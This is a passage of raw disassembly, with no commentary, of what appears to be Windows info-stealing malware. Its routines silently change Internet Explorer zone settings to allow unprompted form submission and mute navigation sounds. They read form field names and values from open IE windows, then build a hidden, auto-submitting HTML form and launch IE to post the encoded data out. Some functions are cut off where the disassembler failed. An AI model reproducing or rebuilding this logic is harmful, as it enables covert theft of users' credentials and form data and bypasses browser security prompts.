-3002Ch var_30022 = byte ptr -30022h var_30018 = dword ptr -30018h var_30014 = dword ptr -30014h var_30010 = dword ptr -30010h var_3000C = dword ptr -3000Ch var_30008 = byte ptr -30008h var_20008 = dword ptr -20008h var_20003 = byte ptr -20003h var_10004 = dword ptr -10004h var_10000 = byte ptr -10000h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h push ebp mov ebp, esp mov eax, 30048h call sub_4078CC push ebx push esi push edi and [ebp+var_30014], 0 and [ebp+var_20008], 0 and [ebp+var_30010], 0 lea eax, [ebp+var_10004] push eax push [ebp+arg_4] call sub_4014E2 add esp, 8 mov esi, eax mov eax, [ebp+var_10004] or eax, eax jz short loc_4036A5 or esi, esi jz short loc_4036A5 cmp [ebp+arg_14], eax jb short loc_4036B5 loc_4036A5: ; CODE XREF: sub_403659+41j ; sub_403659+45j push esi call sub_407A68 ; LocalFree mov [ebp+var_30014], 1 loc_4036B5: ; CODE XREF: sub_403659+4Aj push [ebp+arg_C] call sub_407B4C ; lstrlenA mov [ebp+var_30034], eax mov eax, 64h mul [ebp+var_10004] mov [ebp+var_30038], eax mov edi, [ebp+var_30034] imul edi, [ebp+var_30034], 32h mov edx, [ebp+var_30038] lea edi, [edx+edi+1000h] push edi push 40h call sub_407A5C ; LocalAlloc mov ebx, eax push [ebp+arg_0] push 104h call sub_4079A8 ; GetTempPathA mov eax, [ebp+arg_0] mov [ebp+var_3003C], eax mov ecx, eax or eax, 0FFFFFFFFh loc_403713: ; CODE XREF: sub_403659+BFj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_403713 mov edi, eax push 8 mov edx, [ebp+var_3003C] add edx, edi push edx call sub_4013E4 add esp, 8 push offset a_htm ; ".htm" push [ebp+arg_0] call sub_407E64 add esp, 8 push offset aHtml ; "<html>" push ebx call sub_402F2F add esp, 8 push offset aHead ; "<head>" push ebx call sub_402F2F add esp, 8 push [ebp+arg_1C] push offset aMicrosoftCorp ; "MicroSoft-Corp" push offset aTitleSUTitle ; "<title>%s%u</title>" lea eax, [ebp+var_20003] push eax call sub_407E40 add esp, 10h lea eax, [ebp+var_20003] push eax push ebx call sub_402F2F add esp, 8 push offset aHead_0 ; "</head>" push ebx call sub_402F2F add esp, 8 push offset aBody ; "<body>" push ebx call sub_402F2F add esp, 8 call sub_407E28 mov ecx, 3E8h cdq idiv ecx push edx push offset aF_3u ; "f%.3u" lea edi, [ebp+var_30022] push edi call sub_407E40 add esp, 0Ch lea eax, [ebp+var_30022] push eax push [ebp+arg_8] push offset aFormActionSMet ; "<form action=\"%s\" method=\"POST\" name=\"%"... lea eax, [ebp+var_20003] push eax call sub_407E40 add esp, 10h lea eax, [ebp+var_20003] push eax push ebx call sub_402F2F add esp, 8 call sub_407E28 mov ecx, 9 cdq idiv ecx mov edi, edx add edi, 14h push edi push offset aInputTypeEditV ; "<input type=\"edit\" value='%u' name='a'>"... lea edi, [ebp+var_20003] push edi call sub_407E40 add esp, 0Ch lea eax, [ebp+var_20003] push eax push ebx call sub_402F2F add esp, 8 cmp [ebp+var_30014], 0 jnz loc_403A3A cmp [ebp+arg_18], 0 jz loc_403937 and [ebp+var_30040], 0 jmp loc_40391A ; --------------------------------------------------------------------------- loc_40384D: ; CODE XREF: sub_403659+2CDj mov [ebp+var_10000], 0 and [ebp+var_30044], 0 jmp short loc_4038CD ; --------------------------------------------------------------------------- loc_40385D: ; CODE XREF: sub_403659+27Ej mov eax, [ebp+var_30040] add eax, [ebp+var_30044] cmp eax, [ebp+var_10004] jnb short loc_4038D9 mov edi, [ebp+var_30040] add edi, [ebp+var_30044] movzx edi, byte ptr [esi+edi] mov eax, edi mov ecx, 1Ah cdq idiv ecx add edx, 61h push edx mov eax, edi mov ecx, 1Ah mov edx, 4EC4EC4Fh mul edx shr edx, 3 mov [ebp+var_30048], edx mov edi, edx add edi, 61h push edi lea edi, [ebp+var_10000] push edi push offset aSCC ; "%s%c%c" lea edi, [ebp+var_10000] push edi call sub_407E40 add esp, 14h inc [ebp+var_30044] loc_4038CD: ; CODE XREF: sub_403659+202j cmp [ebp+var_30044], 80h jb short loc_40385D loc_4038D9: ; CODE XREF: sub_403659+216j push [ebp+var_20008] push [ebp+arg_10] lea eax, [ebp+var_10000] push eax push offset aInputTypeEdi_0 ; "<input type=\"edit\" value='%s' name='%s%"... lea eax, [ebp+var_20003] push eax call sub_407E40 lea eax, [ebp+var_20003] push eax push ebx call sub_402F2F add esp, 1Ch add [ebp+var_30040], 80h inc [ebp+var_20008] loc_40391A: ; CODE XREF: sub_403659+1EFj mov eax, [ebp+var_10004] cmp [ebp+var_30040], eax jb loc_40384D mov [ebp+var_30010], eax jmp loc_403A3A ; --------------------------------------------------------------------------- loc_403937: ; CODE XREF: sub_403659+1E2j mov eax, [ebp+arg_14] mov [ebp+var_10004], eax jmp loc_403A16 ; --------------------------------------------------------------------------- loc_403945: ; CODE XREF: sub_403659+3DBj cmp [ebp+var_10000], 0 jz loc_403A16 mov eax, [ebp+arg_14] add eax, 0C800h cmp [ebp+var_10004], eax jnb loc_403A3A mov eax, [ebp+var_10004] mov [ebp+var_30010], eax push [ebp+arg_C] push offset aS ; "%s|" lea eax, [ebp+var_30008] push eax call sub_407E40 add esp, 0Ch lea ecx, [ebp+var_30008] or eax, 0FFFFFFFFh loc_403992: ; CODE XREF: sub_403659+33Ej inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_403992 mov edi, eax mov word ptr [ebp+var_30040+2], di lea eax, [ebp+var_10000] push eax movzx eax, word ptr [ebp+var_30040+2] lea eax, [ebp+eax+var_30008] push eax call sub_4078EC lea eax, [ebp+var_30008] push eax call sub_4035B2 add esp, 4 mov [ebp+var_3000C], eax push [ebp+var_20008] push [ebp+arg_10] push [ebp+var_3000C] push offset aInputTypeEdi_0 ; "<input type=\"edit\" value='%s' name='%s%"... lea eax, [ebp+var_20003] push eax call sub_407E40 add esp, 14h lea eax, [ebp+var_20003] push eax push ebx call sub_402F2F add esp, 8 push [ebp+var_3000C] call sub_407A68 ; LocalFree inc [ebp+var_20008] loc_403A16: ; CODE XREF: sub_403659+2E7j ; sub_403659+2F3j lea eax, [ebp+var_10000] push eax push [ebp+var_10004] push esi call sub_401560 add esp, 0Ch mov [ebp+var_10004], eax or eax, eax jnz loc_403945 loc_403A3A: ; CODE XREF: sub_403659+1D8j ; sub_403659+2D9j ... push offset aInputTypeSubmi ; "<input type=\"submit\" value=''>" push ebx call sub_402F2F push offset aForm ; "</form>" push ebx call sub_402F2F push offset aScript ; "<script>" push ebx call sub_402D21 call sub_407E28 mov [ebp+var_30040], eax call sub_407E28 mov ecx, 63h cdq idiv ecx push edx mov edi, [ebp+var_30040] mov eax, edi mov ecx, 14h cdq idiv ecx mov edi, edx add edi, 61h push edi push offset aC_2u ; "%c%.2u" lea edi, [ebp+var_3002C] push edi call sub_407E40 lea eax, [ebp+var_3002C] push eax push offset aFunctionS ; "function %s(){" lea eax, [ebp+var_20003] push eax call sub_407E40 lea eax, [ebp+var_20003] push eax push ebx call sub_402D21 lea eax, [ebp+var_30022] push eax push offset aDocument_S_sub ; "document.%s.submit();" lea eax, [ebp+var_20003] push eax call sub_407E40 lea eax, [ebp+var_20003] push eax push ebx call sub_402D21 push offset asc_424B31 ; "}" push ebx call sub_402D21 call sub_407E28 mov ecx, 3E8h cdq idiv ecx mov edi, edx add edi, 2710h push edi lea edi, [ebp+var_3002C] push edi push offset aSettimeoutSU ; "setTimeout(\"%s()\",%u);" lea edi, [ebp+var_20003] push edi call sub_407E40 lea eax, [ebp+var_20003] push eax push ebx call sub_402D21 push offset aScript_0 ; "</script>" push ebx call sub_402F2F push offset aBody_0 ; "</body>" push ebx call sub_402F2F push offset aHtml_0 ; "</html>" push ebx call sub_407E64 push [ebp+arg_0] call sub_4024E0 add esp, 8Ch push 0 push 0 push 2 push 0 push 0 push 40000000h push [ebp+arg_0] call sub_407A8C ; CreateFileA mov [ebp+var_30018], eax push ebx call sub_407B4C ; lstrlenA push 0 lea edi, [ebp+var_20008] push edi push eax push ebx push [ebp+var_30018] call sub_407B40 ; WriteFile push [ebp+var_30018] call sub_407984 ; CloseHandle push ebx call sub_407A68 ; LocalFree cmp [ebp+var_30014], 0 jnz short loc_403BB5 push esi call sub_407A68 ; LocalFree jmp short loc_403BBA ; --------------------------------------------------------------------------- loc_403BB5: ; CODE XREF: sub_403659+552j or eax, 0FFFFFFFFh jmp short loc_403BC0 ; --------------------------------------------------------------------------- loc_403BBA: ; CODE XREF: sub_403659+55Aj mov eax, [ebp+var_30010] loc_403BC0: ; CODE XREF: sub_403659+55Fj pop edi pop esi pop ebx leave retn sub_403659 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_403BC5 proc near ; CODE XREF: sub_403D8E:loc_403E12p var_210A = byte ptr -210Ah var_110C = byte ptr -110Ch var_110B = byte ptr -110Bh var_10C = dword ptr -10Ch var_108 = dword ptr -108h var_101 = byte ptr -101h var_100 = byte ptr -100h push ebp mov ebp, esp mov eax, 210Ch call sub_4078CC and [ebp+var_108], 0 mov [ebp+var_101], 0 jmp loc_403CA5 ; --------------------------------------------------------------------------- loc_403BE5: ; CODE XREF: sub_403BC5+E8j movzx eax, [ebp+var_101] push eax push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... lea eax, [ebp+var_100] push eax call sub_407E40 push 4 push 4 lea eax, [ebp+var_108] push eax push offset a1601 ; "1601" lea eax, [ebp+var_100] push eax push 80000001h call sub_401379 push 4 push 4 lea eax, [ebp+var_108] push eax push offset a1601 ; "1601" lea eax, [ebp+var_100] push eax push 80000002h call sub_401379 movzx eax, [ebp+var_101] push eax push offset aSoftwarePolici ; "SOFTWARE\\Policies\\Microsoft\\Windows\\Cur"... lea eax, [ebp+var_100] push eax call sub_407E40 push 4 push 4 lea eax, [ebp+var_108] push eax push offset a1601 ; "1601" lea eax, [ebp+var_100] push eax push 80000002h call sub_401379 push 4 push 4 lea eax, [ebp+var_108] push eax push offset a1601 ; "1601" lea eax, [ebp+var_100] push eax push 80000001h call sub_401379 add esp, 78h add [ebp+var_101], 1 loc_403CA5: ; CODE XREF: sub_403BC5+1Bj mov al, [ebp+var_101] cmp al, 5 jb loc_403BE5 call sub_4079C0 ; GetVersion cmp eax, 80000000h jb short loc_403CE1 push 1 push 4 push offset aYes ; "yes" push offset aBrowsenewproce ; "BrowseNewProcess" push offset a_defaultSoftwa ; ".DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Cur"... push 80000003h call sub_401379 add esp, 18h jmp short loc_403D30 ; --------------------------------------------------------------------------- loc_403CE1: ; CODE XREF: sub_403BC5+F8j lea eax, [ebp+var_110B] push eax call sub_4033E8 lea eax, [ebp+var_110B] push eax push offset aSSoftwareMicro ; "%s\\Software\\Microsoft\\Internet Explorer"... lea eax, [ebp+var_210A] push eax call sub_407E40 and [ebp+var_10C], 0 push 4 push 4 lea eax, [ebp+var_10C] push eax push offset aIexplore_exe ; "iexplore.exe" lea eax, [ebp+var_210A] push eax push 80000003h call sub_401379 add esp, 28h loc_403D30: ; CODE XREF: sub_403BC5+11Aj push 4 push 4 lea eax, [ebp+var_108] push eax push offset aGlobaluseroffl ; "GlobalUserOffline" push offset aSoftwareMicr_1 ; "Software\\Microsoft\\Windows\\CurrentVersi"... push 80000001h call sub_401379 push 1 push 0 push offset byte_424E15 push offset byte_424E15 push offset aAppeventsSchem ; "AppEvents\\Schemes\\Apps\\Explorer\\Navigat"... push 80000001h call sub_401379 push 1 push 0 push offset byte_424E15 push offset byte_424E15 push offset aAppeventsSch_0 ; "AppEvents\\Schemes\\Apps\\Explorer\\Activat"... push 80000001h call sub_401379 add esp, 48h leave retn sub_403BC5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_403D8E proc near ; CODE XREF: sub_405AAC+131p ; sub_405AAC+326p ... var_380 = dword ptr -380h var_379 = byte ptr -379h var_275 = byte ptr -275h var_274 = byte ptr -274h var_270 = dword ptr -270h var_26C = dword ptr -26Ch var_268 = dword ptr -268h var_264 = dword ptr -264h var_260 = byte ptr -260h var_25C = dword ptr -25Ch var_250 = byte ptr -250h var_14C = dword ptr -14Ch var_148 = dword ptr -148h var_11C = dword ptr -11Ch var_118 = word ptr -118h var_104 = byte ptr -104h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h arg_1C = dword ptr 24h push ebp mov ebp, esp sub esp, 380h push esi push edi mov esi, [ebp+arg_0] and [ebp+var_14C], 0 xor edi, edi push offset dword_420008 call sub_407A2C ; InterlockedIncrement mov [ebp+var_264], eax push 10h push 0 lea eax, [ebp+var_260] push eax call sub_407E10 mov [ebp+var_268], 104h lea eax, [ebp+var_274] push eax lea eax, [ebp+var_268] push eax lea eax, [ebp+var_250] push eax push offset aPath ; "Path" push offset aSoftwareMicr_2 ; "Software\\Microsoft\\IE Setup\\Setup" push 80000002h call sub_401326 add esp, 24h mov [ebp+var_26C], eax or eax, eax jnz short loc_403E12 push esi call sub_407A68 ; LocalFree xor eax, eax jmp loc_404113 ; --------------------------------------------------------------------------- loc_403E12: ; CODE XREF: sub_403D8E+75j call sub_403BC5 push 104h lea eax, [ebp+var_104] push eax lea eax, [ebp+var_250] push eax call sub_407924 ; ExpandEnvironmentStringsA push [ebp+var_264] push [ebp+arg_18] push [ebp+arg_14] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_4] push esi lea eax, [ebp+var_250] push eax call sub_403659 add esp, 20h mov [ebp+var_14C], eax cmp [ebp+arg_1C], 0 jz short loc_403E78 cmp eax, 0FFFFFFFFh jz short loc_403E72 mov eax, [ebp+arg_1C] mov edx, [ebp+var_14C] mov [eax], edx jmp short loc_403E78 ; --------------------------------------------------------------------------- loc_403E72: ; CODE XREF: sub_403D8E+D5j mov eax, [ebp+arg_1C] and dword ptr [eax], 0 loc_403E78: ; CODE XREF: sub_403D8E+D0j ; sub_403D8E+E2j cmp [ebp+var_14C], 0 jnz short loc_403E8E push esi call sub_407A68 ; LocalFree xor eax, eax jmp loc_404113 ; --------------------------------------------------------------------------- loc_403E8E: ; CODE XREF: sub_403D8E+F1j push offset aIexplore_exe_0 ; "\\Iexplore.exe " lea eax, [ebp+var_104] push eax call sub_407E64 lea eax, [ebp+var_250] push eax lea eax, [ebp+var_104] push eax call sub_407E64 call sub_402CB2 mov [ebp+var_270], eax push 44h push 0 lea eax, [ebp+var_148] push eax call sub_407E10 push 44h push 0 lea eax, [ebp+var_148] push eax call sub_407E10 add esp, 28h mov [ebp+var_148], 44h mov [ebp+var_11C], 1 mov [ebp+var_118], 1 cmp [ebp+var_270], 0 jz short loc_403F15 lea eax, [ebp+var_148] push eax call sub_402D13 pop ecx jmp short loc_403F1E ; --------------------------------------------------------------------------- loc_403F15: ; CODE XREF: sub_403D8E+176j mov [ebp+var_118], 0 loc_403F1E: ; CODE XREF: sub_403D8E+185j lea eax, [ebp+var_260] push eax lea eax, [ebp+var_148] push eax push 0 push 0 push 20h push 0 push 0 push 0 lea eax, [ebp+var_104] push eax push 0 call sub_407B1C ; CreateProcessA or eax, eax jz loc_4040DC push [ebp+var_25C] call sub_407984 ; CloseHandle push [ebp+var_264] push offset aMicrosoftCorp ; "MicroSoft-Corp" push offset aSUMicrosoftInt ; "%s%u - Microsoft Internet Explorer" lea eax, [ebp+var_104] push eax call sub_407E40 add esp, 10h mov [ebp+var_275], 0 jmp short loc_403FA9 ; --------------------------------------------------------------------------- loc_403F81: ; CODE XREF: sub_403D8E+223j lea eax, [ebp+var_104] push eax push offset aIeframe ; "IEFrame" call sub_407B94 ; FindWindowA mov edi, eax or edi, edi jnz short loc_403FB3 push 3E8h call sub_407AE0 ; Sleep add [ebp+var_275], 1 loc_403FA9: ; CODE XREF: sub_403D8E+1F1j mov al, [ebp+var_275] cmp al, 0Ah jb short loc_403F81 loc_403FB3: ; CODE XREF: sub_403D8E+208j or edi, edi jz loc_4040D3 push 0F000h call sub_407AE0 ; Sleep push 104h lea eax, [ebp+var_104] push eax push edi call sub_407B7C ; GetWindowTextA push 1 push offset aXOkrecv11 ; "X-okRecv11" lea eax, [ebp+var_104] push eax call sub_401429 add esp, 0Ch cmp eax, 0FFFFh jz loc_4040CA lea eax, [ebp+var_379] push eax push [ebp+arg_4] call sub_4034AD add esp, 8 or eax, eax jz loc_4040BE ; DATA XREF: .data:0041CF71w ; .data:0041CF8Bw ... push 0 loc_404014: ; DATA XREF: .data:0041D05Aw push [ebp+arg_8] lea eax, [ebp+var_379] push eax call sub_407A20 ; DATA XREF: .data:0041D054r lea eax, [ebp+var_14C] ; DATA XREF: .data:0041D04Er ; .data:0041D048r push eax push [ebp+arg_8] ; DATA XREF: .data:loc_41CFD9r ; .data:loc_41CFE9r call sub_4014E2 ; DATA XREF: .data:0041CEDDw mov [ebp+var_380], eax ; DATA XREF: .data:0041CEE7w ; .data:0041CF02r ... loc_404038: ; DATA XREF: .data:0041CEEFw push [ebp+arg_8] call sub_407B70 ; DATA XREF: .data:0041CEFCo ; .data:0041CF0Ao push offset aHtml_1 ; "<HTML><!--" call sub_407B4C ; lstrlenA push eax push offset aHtml_1 ; "<HTML><!--" push [ebp+var_380] call sub_407E7C add esp, 14h or eax, eax jnz short loc_40408C push offset aHtml_1 ; "<HTML><!--" call sub_407B4C ; lstrlenA mov edi, [ebp+var_14C] sub edi, 3Ah push edi mov edi, eax add edi, [ebp+var_380] push edi push [ebp+arg_8] call sub_403459 add esp, 0Ch jmp short loc_4040A7 ; --------------------------------------------------------------------------- loc_40408C: ; CODE XREF: sub_403D8E+2D2j ; DATA XREF: .data:0041CE8Cw ... mov eax, [ebp+var_14C] sub eax, 40h ; DATA XREF: .data:0041D3ECw ; .data:0041D3F2r ... push eax push [ebp+var_380] ; DATA XREF: .data:0041E1D5r sub_403D8E endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_40409C proc near ; DATA XREF: .data:0041D316o push dword ptr [ebp+10h] call sub_403459 add esp, 0Ch loc_4040A7: ; CODE XREF: sub_403D8E+2FCj ; DATA XREF: sub_41D468+Co push dword ptr [ebp-380h] call sub_407A68 ; LocalFree mov dword ptr [ebp-14Ch], 2 ; DATA XREF: sub_41D468+1Co jmp short loc_4040E3 ; --------------------------------------------------------------------------- loc_4040BE: ; CODE XREF: sub_403D8E+27Ej mov dword ptr [ebp-14Ch], 1 jmp short loc_4040E3 ; --------------------------------------------------------------------------- loc_4040CA: ; CODE XREF: sub_403D8E+264j and dword ptr [ebp-14Ch], 0 jmp short loc_4040E3 ; --------------------------------------------------------------------------- loc_4040D3: ; CODE XREF: sub_403D8E+227j and dword ptr [ebp-14Ch], 0 jmp short loc_4040E3 ; --------------------------------------------------------------------------- loc_4040DC: ; CODE XREF: sub_403D8E+1BAj and dword ptr [ebp-14Ch], 0 loc_4040E3: ; CODE XREF: sub_40409C+20j ; sub_40409C+2Cj ... lea eax, [ebp-250h] push eax call sub_407B70 ; DeleteFileA push esi call sub_407A68 ; LocalFree push 0 push dword ptr [ebp-260h] call sub_407AEC ; TerminateProcess push dword ptr [ebp-260h] call sub_407984 ; CloseHandle mov eax, [ebp-14Ch] loc_404113: ; CODE XREF: sub_403D8E+7Fj ; sub_403D8E+FBj pop edi pop esi leave retn sub_40409C endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_404117 proc near ; CODE XREF: sub_4043B0+D5p ; sub_404878-18Dp ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ebx push esi push edi mov ebx, [ebp+arg_0] mov esi, [ebp+arg_4] push ebx call sub_407B58 ; lstrlenW mov edi, eax push 0 push 0 push 1FFFh push esi push edi push ebx push 0 push 0 call sub_407B28 ; WideCharToMultiByte mov byte ptr [esi+edi], 0 mov eax, edi pop edi pop esi pop ebx pop ebp retn sub_404117 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40414B proc near ; CODE XREF: sub_404184+80p arg_0 = dword ptr 8 push ebp mov ebp, esp push ebx push edi mov edi, [ebp+arg_0] cmp dword_420010, 0 jz short loc_404167 mov eax, dword_420010 push eax mov ebx, [eax] call dword ptr [ebx+8] loc_404167: ; CODE XREF: sub_40414B+Fj mov eax, [edi+4] push dword ptr [edi+4] mov ebx, [eax] call dword ptr [ebx+8] mov eax, [edi] push dword ptr [edi] mov ebx, [eax] call dword ptr [ebx+8] call sub_406E88 pop edi pop ebx pop ebp retn sub_40414B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_404184 proc near ; CODE XREF: sub_4043B0+37p var_10 = byte ptr -10h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 10h push ebx push esi push edi mov edi, [ebp+arg_0] and dword ptr [edi], 0 and dword ptr [edi+4], 0 push 0 call sub_406E7C lea eax, [ebp+var_10] push eax push offset a9ba05972F6a811 ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" call sub_406E70 mov esi, eax xor ebx, ebx cmp esi, ebx setl bl or ebx, ebx jnz short loc_404203 push edi push offset dword_4253E8 push 4 push 0 lea eax, [ebp+var_10] push eax call sub_406E64 mov esi, eax xor ebx, ebx cmp esi, ebx setl bl or ebx, ebx jnz short loc_404203 mov eax, edi add eax, 4 push eax push offset dword_4253D8 mov eax, [edi] push dword ptr [edi] mov ebx, [eax] call dword ptr ds:0[ebx] mov esi, eax xor ebx, ebx cmp esi, ebx setl bl or ebx, ebx jnz short loc_404203 xor eax, eax inc eax jmp short loc_40420C ; --------------------------------------------------------------------------- loc_404203: ; CODE XREF: sub_404184+33j ; sub_404184+53j ... push edi call sub_40414B pop ecx xor eax, eax loc_40420C: ; CODE XREF: sub_404184+7Dj pop edi pop esi pop ebx leave retn sub_404184 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_404211 proc near ; CODE XREF: sub_4043B0+5Fp var_10020 = byte ptr -10020h var_1001F = byte ptr -1001Fh var_20 = word ptr -20h var_18 = dword ptr -18h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp mov eax, 10024h call sub_4078CC push ebx push esi push edi cmp dword_420014, 0FFFFh jz short loc_404234 and dword_42000C, 0 loc_404234: ; CODE XREF: sub_404211+1Aj mov eax, dword_42000C cmp [ebp+arg_4], eax jz loc_4043AB mov eax, [ebp+arg_4] mov dword_42000C, eax cmp dword_420010, 0 jz short loc_404265 mov eax, dword_420010 push eax mov esi, [eax] call dword ptr [esi+8] and dword_420010, 0 loc_404265: ; CODE XREF: sub_404211+40j push 0FFFFh lea eax, [ebp+var_1001F] push eax push [ebp+arg_4] call sub_407B7C ; GetWindowTextA push 1 push offset aMicrosoftInter ; "Microsoft Internet Explorer" lea eax, [ebp+var_1001F] push eax call sub_401429 add esp, 0Ch cmp eax, 0FFFFh jnz short loc_4042A2 and dword_420010, 0 jmp loc_4043AB ; --------------------------------------------------------------------------- loc_4042A2: ; CODE XREF: sub_404211+83j lea eax, [ebp+var_8] push eax mov eax, [ebp+arg_0] mov eax, [eax+4] push eax mov edi, [eax] call dword ptr [edi+1Ch] mov ebx, eax cmp [ebp+var_8], 0 jz loc_4043AB or ebx, ebx jnz loc_4043AB and [ebp+var_4], 0 cmp dword_420014, 0FFFFh jz short loc_4042F6 inc dword_420014 mov eax, [ebp+var_8] cmp dword_420014, eax jbe short loc_4042EE and dword_420014, 0 loc_4042EE: ; CODE XREF: sub_404211+D4j mov eax, dword_420014 mov [ebp+var_4], eax loc_4042F6: ; CODE XREF: sub_404211+C3j ; sub_404313+8Bj push 0 call sub_407DC8 pop ecx mov [ebp+var_20], 2 mov eax, [ebp+var_4] mov [ebp+var_18], eax mov dword_420014, eax lea eax, [ebp+var_C] push eax sub_404211 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_404313 proc near ; DATA XREF: sub_41D569+1E1o lea esi, [ebp-20h] sub esp, 10h mov edi, esp mov ecx, 4 rep movsd mov edi, [ebp+8] mov edi, [edi+4] push edi mov edi, [edi] call dword ptr [edi+20h] mov ebx, eax or ebx, ebx jnz short loc_404381 push offset dword_420010 push offset dword_4253F8 mov eax, [ebp-0Ch] push eax mov edi, [eax] call dword ptr ds:0[edi] mov ebx, eax or ebx, ebx jnz short loc_404381 lea eax, [ebp-10024h] push eax mov eax, dword_420010 push eax mov edi, [eax] call dword ptr [edi+94h] mov ebx, eax or ebx, ebx jnz short loc_404381 mov dword_420014, 0FFFFh mov eax, [ebp+0Ch] cmp [ebp-10024h], eax jz short loc_4043AB loc_404381: ; CODE XREF: sub_404313+1Fj ; sub_404313+3Cj ... cmp dword_420010, 0 jz short loc_404395 mov eax, dword_420010 push eax mov esi, [eax] call dword ptr [esi+8] loc_404395: ; CODE XREF: sub_404313+75j inc dword ptr [ebp-4] mov eax, [ebp-8] cmp [ebp-4], eax jb loc_4042F6 and dword_420010, 0 loc_4043AB: ; CODE XREF: sub_404211+2Bj ; sub_404211+8Cj ... pop edi pop esi pop ebx leave retn sub_404313 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4043B0 proc near ; CODE XREF: sub_404ED7+3Ap var_52640 = byte ptr -52640h var_52630 = word ptr -52630h var_52628 = dword ptr -52628h var_52620 = dword ptr -52620h var_5261C = byte ptr -5261Ch var_52618 = dword ptr -52618h var_52614 = byte ptr -52614h var_5260C = dword ptr -5260Ch var_52608 = dword ptr -52608h var_52604 = dword ptr -52604h var_52600 = dword ptr -52600h var_525FA = word ptr -525FAh var_525F8 = dword ptr -525F8h var_525F4 = dword ptr -525F4h var_525E4 = byte ptr -525E4h var_524CC = dword ptr -524CCh var_10FAC = dword ptr -10FACh var_10FA8 = dword ptr -10FA8h var_10001 = byte ptr -10001h var_2 = word ptr -2 ; FUNCTION CHUNK AT 00404ED2 SIZE 00000005 BYTES push ebp mov ebp, esp mov eax, 6378Ch call sub_4078CC push ebx push esi push edi push offset aValue ; "value" call sub_406E40 mov [ebp+var_10FA8], eax push offset aName ; "name" call sub_406E40 mov [ebp+var_10FAC], eax lea eax, [ebp+var_52614] push eax call sub_404184 pop ecx or eax, eax jz loc_404ED2 loc_4043F5: ; CODE XREF: sub_4043B0+6Ej ; sub_4043B0+86j ... push 0 call sub_407DC8 call sub_407BC4 ; GetForegroundWindow mov [ebp+var_5260C], eax push eax lea eax, [ebp+var_52614] push eax call sub_404211 add esp, 0Ch cmp dword_420010, 0 jz short loc_4043F5 lea eax, [ebp+var_525F4] push eax mov eax, dword_420010 push eax mov edi, [eax] call dword ptr [edi+48h] mov ebx, eax or ebx, ebx jnz short loc_4043F5 lea eax, [ebp+var_525F8] push eax push offset dword_425398 mov eax, [ebp+var_525F4] push eax mov edi, [eax] call dword ptr ds:0[edi] mov ebx, eax or ebx, ebx jnz loc_404EB4 lea eax, [ebp+var_52618] push eax mov eax, dword_420010 push eax mov edi, [eax] call dword ptr [edi+78h] mov ebx, eax or ebx, ebx jnz loc_404E9F push offset byte_409130 push [ebp+var_52618] call sub_404117 add esp, 8 mov edi, eax inc edi mov [ebp+var_52620], edi mov eax, [ebp+var_5260C] mov ds:dword_419134, eax lea eax, [ebp+var_525FA] push eax mov eax, dword_420010 push eax mov edi, [eax] call dword ptr [edi+7Ch] mov ebx, eax or ebx, ebx jnz loc_404E9F cmp [ebp+var_525FA], 0 jnz loc_404E9F mov [ebp+var_10001], 0 mov [ebp+var_2], 0 lea eax, [ebp+var_52600] push eax mov eax, [ebp+var_525F8] push eax mov edi, [eax] call dword ptr [edi+5Ch] mov ebx, eax or ebx, ebx jnz loc_404E9F lea eax, [ebp+var_5261C] push eax mov eax, [ebp+var_52600] push eax mov edi, [eax] call dword ptr [edi+20h] mov ebx, eax or ebx, ebx jnz loc_404E8A or [ebp+var_524CC], 0FFFFFFFFh loc_404519: ; CODE XREF: sub_404878+2A8j and [ebp+var_52604], 0 and [ebp+var_52608], 0 cmp [ebp+var_524CC], 0FFFFFFFFh jnz short loc_404552 lea eax, [ebp+var_525E4] push eax mov eax, [ebp+var_525F8] push eax mov edi, [eax] call dword ptr [edi+38h] mov ebx, eax or ebx, ebx jz loc_40460A jmp loc_404B0E ; --------------------------------------------------------------------------- loc_404552: ; CODE XREF: sub_4043B0+17Ej mov [ebp+var_52630], 17h mov eax, [ebp+var_524CC] mov [ebp+var_52628], eax lea eax, [ebp+var_52640] push eax lea eax, [ebp+var_52630] push eax mov eax, [ebp+var_52600] push eax sub_4043B0 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_40457C proc near ; DATA XREF: sub_41D569+E0o mov esi, [eax] call dword ptr [esi+1Ch] lea eax, [ebp-52604h] push eax push offset dword_4253C8 mov eax, [ebp-52638h] push eax mov edi, [eax] call dword ptr ds:0[edi] mov ebx, eax or ebx, ebx jnz loc_404B0E lea eax, [ebp-52608h] push eax mov eax, [ebp-52604h] push eax mov edi, [eax] call dword ptr [edi+0D0h] mov ebx, eax or ebx, ebx jz short loc_4045D4 mov eax, [ebp-52604h] push eax mov esi, [eax] call dword ptr [esi+8] jmp loc_404B0E ; --------------------------------------------------------------------------- loc_4045D4: ; CODE XREF: sub_40457C+45j lea eax, [ebp-525E4h] push eax mov eax, [ebp-52608h] push eax mov edi, [eax] call dword ptr [edi+38h] mov ebx, eax or ebx, 